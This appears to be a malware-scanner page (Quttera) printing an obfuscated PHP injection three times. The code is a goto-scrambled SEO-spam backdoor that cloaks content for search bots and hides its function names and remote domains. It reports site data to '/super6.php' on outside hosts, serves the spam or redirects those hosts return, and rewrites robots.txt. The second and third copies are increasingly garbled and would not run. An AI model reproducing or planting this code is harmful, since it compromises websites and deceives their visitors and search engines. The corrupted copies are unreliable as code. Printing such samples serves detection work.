goto PbqcS; oA1jF: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto V4TXu; glvMQ: $model = "index"; goto oA1jF; z7Z34: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto xm_XJ; SxYXD: $duri = drequest_uri() ?: "/"; goto mNuTN; giV3H: $host = $_SERVER["HTTP_HOST"] ?: ''; goto Zf57p; mNuTN: $model_file = "index.php"; goto glvMQ; Rh3mE: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "http://" . $domain_decoded . "/super6.php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla}.0 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = $functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto pKNVW; hZofn: create_robots($http . "://" . $host); goto wZzhi; JY16z: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto hZofn; jz2PR: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/1.1 Internal Server Error"), "4page" => array("header" => "HTTPy.1 404 Not Found"), "3page" => array("header" => "HTTPyq 1 Moved Permanently", "replace" => "301page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"])) { if ($istest) { echo $string; } } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto z7Z34; PbqcS: $xmlname = array("%%30%30%30%2D%79%.1%78%%38+5%2E%63%%62.6/6%66%2E.7%62.3", "+2%30%30+0%2D%79%76%/8%%38%35%2E%%61%72%%73%6E%6F/9%6C*E%6B.C%6D", "%32+0+0%30%2D%79%76.1%78%%38+5%2E.F%65/6%74/5%%75%62%65/6%63*E%6B.C.D", "%32%%30+0%2D%79%%61%78%31%38%%2E%%72%6B%67%72.1.3.8%.3%2E%6B%6C%6D"); goto joeE2; m1uWV: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto Qo5Bv; joeE2: $string = "20-link185"; goto giV3H; tSR17: $model = stristr($duri, "/?") ? "?" : $model; goto NAO5P; tzIxD: function create_robots($url) { $functions = func(); $path = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt"; $content = "User-agent: *
Allow: /
\xaSitemap: " . $url . "/sitemap.xml\xa"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = @$functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto Rh3mE; KHVIK: $http = is_https() ? "https" : "http"; goto m1uWV; xm_XJ: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto POOXc; V4TXu: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto tSR17; dRlJ_: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto E4QIK; Zf57p: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto EDS9u; EDS9u: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto KHVIK; E4QIK: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/index.php", '', $duri); $duri = str_replace("!", '', $duri); } goto JY16z; POOXc: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off") { if ($https !== '') { return true; } } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"])) { if ($_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off") { if ($front_end_https !== '') { return true; } } } return false; } goto tzIxD; wZzhi: $html_content = request($xmlname, $param); goto jz2PR; Qo5Bv: $zz = disbot(); goto SxYXD; NAO5P: $istest = false; goto dRlJ_; pKNVW: function func() { $chars = range("a", "z"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[15] . $chars[20] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[6] . $chars[4] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . $chars[14] . $chars[19] . ""); }
goto PbqcS; oA1jF: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto V4TXu; glvMQ: $model = "index"; goto oA1jF; z7Z34: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto xm_XJ; SxYXD: $duri = drequest_uri() ?: "/"; goto mNuTN; giV3H: $host = $_SERVER["HTTP_HOST"] ?: ''; goto Zf57p; mNuTN: $model_file = "indexphp"; goto glvMQ; Rh3mE: function request($webs, $param) { shuffle($webs); foreach ($webs as $domain) { $domain_decoded = "n"(urldecode($domain)); $url = "http://" . $domain_decoded . "/super6php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla}.0 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = "u"($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto pKNVW; hZofn: create_robots($http . "://" . $host); goto wZzhi; JY16z: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto hZofn; jz2PR: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/11 Internal Server Error"), "4page" => array("header" => "HTTPy1 404 Not Found"), "3page" => array("header" => "HTTPyq 1 Moved Permanently", "replace" => "301page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"])) { if ($istest) { echo $string; } } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto z7Z34; PbqcS: $xmlname = array("%%30%30%30%2D%79%.1%78%%38+5%2E%63%%626/6%66%2E7%623", "+2%30%30+0%2D%79%76%/8%%38%35%2E%%61%72%%73%6E%6F/9%6C*E%6BC%6D", "%32+0+0%30%2D%79%761%78%%38+5%2EF%65/6%74/5%%75%62%65/6%63*E%6BCD", "%32%%30+0%2D%79%%61%78%31%38%%2E%%72%6B%67%72138%.3%2E%6B%6C%6D"); goto joeE2; m1uWV: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto Qo5Bv; joeE2: $string = "20-link185"; goto giV3H; tSR17: $model = stristr($duri, "/?") ? "?" : $model; goto NAO5P; tzIxD: function create_robots($url) { $path = $_SERVER["DOCUMENT_ROOT"] . "/robotstxt"; $content = "User-agent: *
Allow: /
\xaSitemap: " . $url . "/sitemapxml\xa"; if (!file_exists($path)) { "f"($path, $content); } else { $existing_content = @"u"($path); if ($existing_content !== $content) { "f"($path, $content); } } } goto Rh3mE; KHVIK: $http = is_https() ? "https" : "http"; goto m1uWV; xm_XJ: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto POOXc; V4TXu: if (!empty($matches)) { $model_file = "u"; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto tSR17; dRlJ_: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto E4QIK; Zf57p: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto EDS9u; EDS9u: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto KHVIK; E4QIK: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/indexphp", '', $duri); $duri = str_replace("!", '', $duri); } goto JY16z; POOXc: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off") { if ($https !== '') { return true; } } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"])) { if ($_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off") { if ($front_end_https !== '') { return true; } } } return false; } goto tzIxD; wZzhi: $html_content = request($xmlname, $param); goto jz2PR; Qo5Bv: $zz = disbot(); goto SxYXD; NAO5P: $istest = false; goto dRlJ_; pKNVW: function func() { $chars = range("a", "z"); return array(")" . $chars[8] . $chars[11] . "(_" . $chars[15] . $chars[20] . $chars[19] . "_n" . $chars[14] . $chars[13] . $chars[19] . "(" . $chars[13] . $chars[19] . $chars[18], ")" . $chars[8] . $chars[11] . "(_" . $chars[6] . "(" . $chars[19] . "_n" . $chars[14] . $chars[13] . $chars[19] . "(" . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . $chars[14] . $chars[19] . ""); }
goto PbqcS; oA1jF: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto V4TXu; glvMQ: $model = "index"; goto oA1jF; z7Z34: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto xm_XJ; SxYXD: $duri = drequest_uri() ?: "/"; goto mNuTN; giV3H: $host = $_SERVER["HTTP_HOST"] ?: ''; goto Zf57p; mNuTN: $model_file = "indexphp"; goto glvMQ; Rh3mE: function request($webs, $param) { shuffle($webs); foreach ($webs as $domain) { $domain_decoded = "n"(urldecode($domain)); $url = "http://" . $domain_decoded . "/super6php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla}.0 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = "u"($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto pKNVW; hZofn: create_robots($http . "://" . $host); goto wZzhi; JY16z: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto hZofn; jz2PR: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/11 Internal Server Error"), "4page" => array("header" => "HTTPy1 404 Not Found"), "3page" => array("header" => "HTTPyq 1 Moved Permanently", "replace" => "301page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"])) { if ($istest) { echo $string; } } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto z7Z34; PbqcS: $xmlname = array("%%30%30%30%2D%79%.1%78%%38+5%2E%63%%626/6%66%2E7%623", "+2%30%30+0%2D%79%76%/8%%38%35%2E%%61%72%%73%6E%6F/9%6C*E%6BC%6D", "%32+0+0%30%2D%79%761%78%%38+5%2EF%65/6%74/5%%75%62%65/6%63*E%6BCD", "%32%%30+0%2D%79%%61%78%31%38%%2E%%72%6B%67%72138%.3%2E%6B%6C%6D"); goto joeE2; m1uWV: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto Qo5Bv; joeE2: $string = "20-link185"; goto giV3H; tSR17: $model = stristr($duri, "/?") ? "?" : $model; goto NAO5P; tzIxD: function create_robots($url) { $path = $_SERVER["DOCUMENT_ROOT"] . "/robotstxt"; $content = "User-agent: *
Allow: /
\xaSitemap: " . $url . "/sitemapxml\xa"; if (!file_exists($path)) { "f"($path, $content); } else { $existing_content = @"u"($path); if ($existing_content !== $content) { "f"($path, $content); } } } goto Rh3mE; KHVIK: $http = is_https() ? "https" : "http"; goto m1uWV; xm_XJ: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto POOXc; V4TXu: if (!empty($matches)) { $model_file = "u"; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto tSR17; dRlJ_: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto E4QIK; Zf57p: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto EDS9u; EDS9u: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto KHVIK; E4QIK: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/indexphp", '', $duri); $duri = str_replace("!", '', $duri); } goto JY16z; POOXc: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off") { if ($https !== '') { return true; } } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"])) { if ($_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off") { if ($front_end_https !== '') { return true; } } } return false; } goto tzIxD; wZzhi: $html_content = request($xmlname, $param); goto jz2PR; Qo5Bv: $zz = disbot(); goto SxYXD; NAO5P: $istest = false; goto dRlJ_; pKNVW: function func() { return array(")""(_" . $chars[15] . $chars[20] . $chars[19] . "_n)"" . $chars[19] . "("" . $chars[19] . $chars[18], ")""(_"(" . $chars[19] . "_n)"" . $chars[19] . "("" . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . ")" . $chars[19] . ""); }
© 2023 Quttera Ltd. All rights reserved.